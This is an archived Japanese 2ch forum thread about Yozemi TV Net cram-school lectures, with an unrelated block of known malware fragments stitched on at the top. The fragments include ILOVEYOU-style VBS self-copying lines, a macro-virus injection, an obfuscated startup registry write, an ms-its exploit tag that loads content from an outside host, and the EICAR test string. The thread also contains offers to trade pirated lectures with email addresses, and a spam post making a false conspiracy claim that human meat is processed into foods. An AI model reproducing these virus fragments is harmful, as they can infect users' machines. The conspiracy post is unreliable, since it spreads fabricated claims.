fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???



164 :てってーてき名無しさん:2006/09/08(金) 17:30:46 ID:KGCrYvDu
>>161
俺持ってるよ

165 :てってーてき名無しさん:2006/09/08(金) 23:21:26 ID:???
164
もしよかったらメールください☆

166 :てってーてき名無しさん:2006/09/09(土) 00:25:07 ID:ODeY7l+V
>>165
ほしいの?
俺があげるの?
こういうのあげていいの?

167 :てってーてき名無しさん:2006/09/09(土) 00:40:06 ID:???
わからないです
ダメだったらいいです☆ いらないです☆

168 :てってーてき名無しさん:2006/09/09(土) 10:45:57 ID:???
>>166
逮捕されます

169 :てってーてき名無しさん:2006/09/09(土) 10:48:05 ID:Tv5F+qGs
>>165
代ゼミ法務部にレス内容とメルアドごと通報しておきました

170 :てってーてき名無しさん:2006/09/12(火) 03:16:12 ID:???
高宮学園の印刷やってる会社に勤めてんだけど、模試の問題と回答刷ってるよ。
不忍池の前にある印刷会社で刷ってる。

171 :てってーてき名無しさん:2006/09/19(火) 06:36:21 ID:x0CrY/Lm
代ゼミTVnetなくなったんだね。世話になったから、一つの時代が終わったって感じで寂しい。

172 :てってーてき名無しさん:2006/09/19(火) 11:08:02 ID:???


173 :てってーてき名無しさん:2006/09/19(火) 11:12:10 ID:???


174 :てってーてき名無しさん:2006/10/18(水) 01:00:09 ID:5uCt8orF
>>171
スカパーからブロードバンドに変更しただけ。

175 :来年受験生:2006/10/22(日) 15:54:06 ID:???
独学と代ゼミTV(BB)で頑張ろうと思っているんですけど
代ゼミTVや代ゼミBBで同じように頑張っている人、頑張ろうとしている人
っていますか? お仲間募集中です。
みんなやっぱ予備校いくのかな・・・

176 :てってーてき名無しさん:2006/10/25(水) 00:03:33 ID:???
よぜみBBの良くないところは視聴期限があることなんです。
ダウンロードしておいたデータは期限が来ると見れなくなる訳。
TVネットとは大きな違いである。

177 :来年受験生:2006/10/25(水) 21:56:45 ID:???
やっぱなかなかいないですよね・・・
全然メールきませんしw
情報交換とかしたかったんですけど・・・
掲示板があまりに過疎化なもんで^^;

178 :てってーてき名無しさん:2006/10/29(日) 00:32:35 ID:NEC2Fwpl
今年の新講座の配信は、もうないのかな?

179 :てってーてき名無しさん:2006/11/17(金) 00:22:32 ID:2gBFKZeD
ないよ。

180 :てってーてき名無しさん:2006/11/25(土) 00:12:21 ID:2C1hixXi
あげ

181 :てってーてき名無しさん:2006/11/26(日) 22:43:57 ID:JLVP0Qwt
売るのはいけないけど、あげるのはいいんだよ

182 :てってーてき名無しさん:2006/12/09(土) 22:08:02 ID:AQGkDtp+
【アミノ酸点滴液やアミノ酸調味料などは人肉由来である可能性の方が高い:死者への尊厳は?】
http://life7.2ch.net/test/read.cgi/psy/1162598313/640-661

このまま人肉流通が世界全体で拡大すると、巨額の裏金捻出を原動力に水面下の
秋田県で続いている異様な人喰い殺人集団犯罪状況が全国拡大しかねない事を危惧します。
http://society3.2ch.net/test/read.cgi/giin/1160835645/137-157

自然死・事故死・自殺・拉致偽装した組織的な大量殺人(県庁、病院、県警、自衛隊災害派遣、林業業者等が被疑者)および「本当の意味での自然死」した遺体
            ↓ 
日本国内の葬儀社・病院での遺体解体(遺体損壊罪:臓器ビジネス用臓器摘出、ワイン製造用血液採取、ヒト成長ホルモンHGH採取)および
「北朝鮮、韓国、インドネシア、台湾、中国からのぶつ切り人間死体の不正輸入」 → 他の動物名(鯨、馬、犬、牛、豚)で人肉を食肉(生肉)として販売。
  ↓                  ↓                                ↓                ↓
臓器&HGH等摘出      ミンチに加工 → ソーセージ等              外食産業(焼肉屋等)     一部は冷凍食品として販売  
                     ↓
    大型の塩酸タンクに投入し加熱(塩酸加水分解)
      ↓              ↓
   上澄みの油部分      分解されたアミノ酸 
      ↓              ↓
石鹸、飼料、調理油、乳剤   NaOHで中和  →  アミノ酸肥料  → 「環境に優しい」有機農業キャンペーン                     ↓
                     ↓
                  HPLCで分画
                     ↓
アミノ酸点滴液、アミノ酸調味料(即席ラーメン等)、アミノ酸化粧品、アミノ酸飲料、アミノ酸健康食品

*「死者の尊厳」がないに等しい社会では「生命の尊厳」もなくなり国家や精神文明が崩壊しかねない。


183 ::2006/12/10(日) 15:03:18 ID:WWPFeiQ4
はじめまして代ゼミTVNET時代の東大対策や早稲田対策などをお持ちの方いらっしゃいますでしょうか?
私は大体というかほぼ持っているんですけど交換やほしいという方メールください。keita.m.1221.sakurasaku@docomo.ne.jp
お願いします。

184 :てってーてき名無しさん:2006/12/10(日) 15:54:12 ID:???
↑詐欺ですので注意しましょう

185 :nanasi:2006/12/12(火) 17:31:49 ID:SkX6v7FZ
詐欺じゃなかったですよ。そういっているあなたが詐欺ですよね(笑)
私は交換成立しましたよ。結構親切な方でした。

186 :nanasi:2006/12/12(火) 17:38:08 ID:SkX6v7FZ
いますよ。

187 :てってーてき名無しさん:2006/12/29(金) 02:48:08 ID:1uDqseyz
「東大対策」「早稲田対策」「メディカル対策」の復活希望!

188 :てってーてき名無しさん:2007/01/02(火) 00:54:46 ID:c674Z+mv
今年度で、吉野引退!

《来年度の希望》
1)散りなおし希望
『富田の基礎から学ぶ英文読解』
『富田の英文読解 論理と解法』

2)廃止希望
『富田の英文読解 論理と解法 演習講座』

3)新設講座
『湯浅のむずかしいことを易しく解く受験数学V・C』
『笹井のハイレベル現代文演習 演習講座』『元井のハイレベル古文演習 演習講座』
『宮下のハイレベル漢文演習 演習講座』『平尾のハイレベル小論文演習 演習講座』
『為近のハイレベル物理演習 演習講座』『岡島のハイレベル化学演習 演習講座』
『中嶋のハイレベル生物演習 演習講座』『八柏のハイレベル日本史論述演習』
『土屋文明のハイレベル日本史演習 演習講座』『祝田のハイレベル世界史論述演習』
『上住のハイレベル世界史演習 演習講座』『武井のハイレベル地理論述演習』
『武井のハイレベル地理演習 演習講座』『吉田のハイレベル政経演習 演習講座』

4)その他
@『センター標準講座』『センター実戦講座』の統合
A『東大対策講座』『早大対策講座』の復活
B『メディカルスペシャル』→『国公立医学部対策講座』『私立薬学部対策講座』として復活
C『難関・有名私大へのアプローチ』→『有名私大対策講座』として復活
D『入試基礎講座』を60分×24回から90分×12回として取り直し
E価格改正!

189 ::2007/01/06(土) 23:43:19 ID:yNCR1eFE
必要なかたいまっすか?どうぞ遠慮なくメールくださいお待ちしています

190 :てってーてき名無しさん:2007/01/24(水) 18:24:59 ID:zboBrjav
>>189
荻野の勇者を育てるVC持ってる?

191 :てってーてき名無しさん:2007/01/26(金) 19:44:55 ID:9y1XKQHt
>>190
だーから、詐欺だっつーの。
こんなにわかりやすいのに掛かんなよw

192 :てってーてき名無しさん:2007/01/26(金) 20:42:47 ID:SXlYCSv4
>>191
やっぱり…?

193 :てってーてき名無しさん:2007/02/06(火) 04:53:10 ID:???
どなたか、スカパー!でやっていた代ゼミTVネットをお持ちの方、交換をお願いできないでしょうか?
こちらは以下のものを持っております。

「荻野の勇者を育てる数学 V・C」96回×45分…現行代ゼミBBの同名講義に相当。ただし、スカパー!のほうが時間が多いので内容が充実している。
「荻野の天空への理系数学」12回×90分…現行代ゼミBBの同名講義に相当。ただし、スカパー!のほうが時間が多いので扱う問題数が若干多い。
「荻野の天空への理系数学 演習講座」12回×90分
「為近の物理演習 IB・U(I)」12回×90分…現行代ゼミBBの為近のハイレベル理系物理に相当。ただし、スカパー!のほうが時間が多いので扱う問題数が多い。
「為近の物理演習 IB・U(U)」12回×90分…同上。
「亀田のスーパーレベル医系化学特講 基礎編」4回×90分
「亀田のスーパーレベル医系化学特講 実戦編」4回×90分
「富田の英文読解 論理と解法」12回×90分
「富田の英文読解 論理と解法 演習講座」12回×90分
「中嶋の生物合否決定問題攻略26」12回×90分

以上は全てスカパー!のもので、以下は現行の代ゼミBBのものです。

「為近の基礎から学ぶ物理I」


この中に欲しいものがありましたら、そちらの所持リストをお送りいただき、ぜひ交換お願いします。
また、現行の代ゼミBBの講義を購入検討の方、こちらもBBに欲しい講義がありますので、
もしこちらと欲しいものが一致したら共同購入しませんか?
yozemi_bb@yahoo.co.jpにメール下さい。
代ゼミの講義はすばらしいものが多いです。受験頑張りましょう。

194 :てってーてき名無しさん:2007/02/07(水) 00:39:45 ID:???
代ゼミ法務部に通報しておいたからな。覚悟しておけよ。

195 :てってーてき名無しさん:2007/02/07(水) 11:03:25 ID:???
>また、現行の代ゼミBBの講義を購入検討の方、こちらもBBに欲しい講義がありますので、
>もしこちらと欲しいものが一致したら共同購入しませんか?

視聴期限があるから無理だろ。
みんなお金払ってみてんだから、自分だけズルしようなんて思うなよw

196 :てってーてき名無しさん:2007/02/07(水) 13:57:17 ID:???
詐欺でした…。

197 :てってーてき名無しさん:2007/02/07(水) 14:31:47 ID:???
こういう詐欺多いよな。

198 :てってーてき名無しさん:2007/02/11(日) 20:17:06 ID:???
俺は2004年度にこのチャンネルを視聴していた。
その時、大学生になったら見ようと思って英検2・準1級と漢検の講座を録画した。
そして今、TVネットのことを思い出したらもうスカパーではやってないとのこと。

あの検定講座も消えちゃった。
しかも、番組用テキストが絶版。英検2級はかろうじて在庫があったが、準1のリスニング編だけは
大型書店にもない…
「10日間でらくらくクリア英検準1―リスニング」(マクミラン)ISBN:4-89585-867-7
これだけ手に入らなかった。早めに買い占めておくべきだった…
スカパーが消えてるんだから、テキストだって消えるよな。


199 :てってーてき名無しさん:2007/02/11(日) 20:27:51 ID:???
『望月光の漢検1・準1・2・3級』『水野卓の英検リスニング準1級』
漢検講座のテキスト:「日本漢字能力検定受験級判定問題集―1・準1・2・3」(三省堂)
絶版だけど、望月の番組は問題がテロップで出るからテキストは必要なし。
『望月のハイレベル古文』だって、テキストいらなかった。

誰か検定の講座見てた人いない?

200 :てってーてき名無しさん:2007/02/11(日) 20:59:27 ID:???
代ゼミTVネットって1998年に始まったんでしょ?
そりゃあ、テキストも絶版になるよな・・・
「福田の基礎現代文 サテライト・オブ・ラブ」PartT・U
「青木の基礎現代文 Yah!Yah!Yah!」PartT・U
「今井の英文法入門」PartT・U
「吉田のスーパービジョン数学UB」その他絶版書が続々とある。
98年、99年、その頃は年間96講という大がかりな番組が放送されていた。
代ゼミを辞職した竹内睦泰の96回分のコンテンツ。これに代わって2001年から、すでに辞職している菅野祐孝が
TVネットに抜擢。
竹内の日本史受けてみたかった。96講分の板書って、膨大な量だろうな。
神主(姦主?)と言われていた元代ゼミ日本史。2000年度を以ってミレニアム辞職…

201 :てってーてき名無しさん:2007/02/11(日) 21:25:15 ID:K4QNzNJX
世界史の佐藤幸夫って、TVネット始まった時から今までずっと一人勝ちしててすごい。(平成10年度〜18年度)
日本史選択だった俺には関係ない番組だが。

代ゼミ日本史科の人間関係はドロドロしている。
竹内睦泰('91〜'00)、伊達日角('94〜)、土屋文明('99〜)、結城将行('99〜)
八柏、菅野(元代ゼミ)、前田(〜'04)はもっと古い時代。
TVネットもサテラインもコロコロと担当者が変わってわけがわからない!

202 :てってーてき名無しさん:2007/02/12(月) 13:31:21 ID:???
今更、「菅野の日本史B立体パネル」なんて番組いらないと思う。
竹内の”各45分×通年96回”の番組を放送できなくなった為、菅野が帰って来た。
菅野祐孝なんて土屋博映(つっちー)、佐藤忠志(金ピカ先生)、山本矩一郎、その時代の代ゼミ講師だぞ。
ヨボヨボの爺さん。

203 :てってーてき名無しさん:2007/02/12(月) 23:04:12 ID:???
1999年度代ゼミTVネットの番組
「富田のビジュアル英文読解」45分×96回
「望月の基礎古文文法マニュアル」45分×96回
「木原のENGLISHラリー」45分×96回
「淵野のPower up数学T・A」
「吉田のスーパービジョン数学U・B」
「山本のVisual数学V・C」

204 :てってーてき名無しさん:2007/02/13(火) 22:59:14 ID:???
代ゼミTVネットのDVD(英語、数学etc.)を持ってるんですが、
どなたか交換していただけませんか?
お気軽にメールください。

205 :204:2007/02/13(火) 23:04:31 ID:???
個人的な趣味で代ゼミTVのビデオ見てます。
もしよろしければどうぞ。

206 :てってーてき名無しさん:2007/02/14(水) 10:58:57 ID:???
代ゼミTVネットの検定講座、「水野の英検リスニング準1級」と「望月の漢検1〜3級」の番組用テキストが見当たりません。
代々木ライブラリー本店に行ってもなかったし、紀伊国屋書店新宿南店にもなかった。
受講していた方、英検準1級を取得した方、テキストの情報をお寄せ下さい。
私は、ビデオのツメを折ってこの番組を保存していたんです。大学2年生の春休みを利用して英検の勉強をしようと思い立ったら、
テキストが入手できなかった。
他にも、富田先生や望月先生の番組のビデオを持っています。

207 :204:2007/02/14(水) 17:46:22 ID:???
>>204-205は私です。(>>206は別の方)
英語はだいたい持ってます。
数学も結構あります。
理科も若干は。

208 :206:2007/02/14(水) 18:15:11 ID:???
マクミラン ランゲージハウス刊のTVネット用テキスト、売っている書店を教えて下さい。
東京23区内のブックオフを見てみたら、「2級リーディング」という関係ないシリーズがあった。
なぜリスニングはないんだ?そのリーディングの本(マクミラン)は\650で買いましたけど。
準1級リスニングだけは、どこを探してもない・・・
これさえあれば受講には困らない。
実家から買いに行ける宮城県仙台市内、あるいは今私が住んでいる東京23区内の書店の情報を求む!

209 :てってーてき名無しさん:2007/02/15(木) 09:40:52 ID:t2hya9pT
『10日間でらくらくクリア英検準1級―リスニング』(マクミランランゲージハウス)
『日本漢字能力検定受験級判定問題集―1・準1・2・3級』(三省堂)
準1Lis水野卓、漢検望月光

210 :てってーてき名無しさん:2007/02/18(日) 16:46:20 ID:oP72Qk7s
345チャンネルは欠番
1998.3〜2006.3の8年間、全国の受験生の教育に貢献したこのチャンネル。
特に地方の受験生にはありがたいものだったと思う。
東京近郊在住じゃなくても、サテラインゼミに出講していない先生の授業も受けられた。
代ゼミ札幌・仙台・岡山・広島・福岡あたりの校舎はサテラインだけが頼りだもんな。

211 ::2007/02/21(水) 23:08:36 ID:mSpnOM+5
はじめまして
代ゼミTVネットを受けてる高2です。


私は数学は浅見、岡本、勇者の育てるVC、
英語は西さんの基本はここだ!、ポレポレ、ポレポレ演習、富田
あと理科とかもあります。


上に書いたもの以外にもまだ持ってますんで、
もし交換してくださる方や欲しい方がいたらメールください。

keita21_001@mail.goo.ne.jp

212 :K:2007/02/21(水) 23:17:14 ID:mSpnOM+5
個人的に今のTVネットでは消えてしまった講義とか欲しいです。

213 :てってーてき名無しさん:2007/02/22(木) 13:40:50 ID:???
代ゼミに通報完了っと

214 :てってーてき名無しさん:2007/02/22(木) 14:02:15 ID:hkmVr5tp
っていうかこんな感じの投稿多いね。
上見る限りでは4人。

215 :てってーてき名無しさん:2007/02/22(木) 14:03:18 ID:hkmVr5tp
西岡さんのブリーフィリング誰か譲ってくれないかなー・・・。

216 :てってーてき名無しさん:2007/02/23(金) 19:52:44 ID:Qtd/B1ZP
スカパー時代の代ゼミTVネット名講義
「ビジュアル英文読解」(富田一彦、各45分×96回)
「超速日本史」(竹内睦泰、96講)
「基礎現代文サテライトオブラブ」(福田清盛、96講)
「基礎古文問題演習」(土屋博映、96講)
「スーパービジョン数学UB」(吉田克俊、96講)
この辺の講義ビデオはR25指定。1998〜2000年度辺り放映だから、受講生はすでに大学を卒業している。
昔は45分ずつの細切れで回数が多かった。今より中身の濃い授業。
大学受験人口も'98〜'99年度の約16万人→'00〜'03年度の約15万人、
それ以降は13万人にまで減って来ている。TVネット開始当初の16万人から3万人以上も減ったそうだ。
予備校に来る生徒は近年著しく減っていて、CS放送からも脱退した。

217 :てってーてき名無しさん:2007/02/23(金) 20:08:03 ID:Qtd/B1ZP
広末涼子が早稲田大学に入学した1999年度。
その頃に比べて3〜4万人受験生が減り、受験も簡単になって来て、人気のないテキストは絶版、
人気のない番組も放送終了・・・

今の20代後半の世代で受験戦争は最後だったんだな。竹内睦泰が代ゼミから消えた頃から
入試は簡単になり始め、偏差値低下。21世紀になって予備校倒産の時代が訪れた。

218 :てってーてき名無しさん:2007/02/23(金) 21:34:59 ID:???
俺、15年前に代ゼミ大阪校に通ってたけど>216見て見た覚えのある名前のヤツがまだいた。

富田一彦、土屋博映、吉田克俊の3人確か富田っていうのはサテラインやってたような気がする。
理系だったからあとの二人は名前しか知らん。

人気講師って結構長続きするんだね。

48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)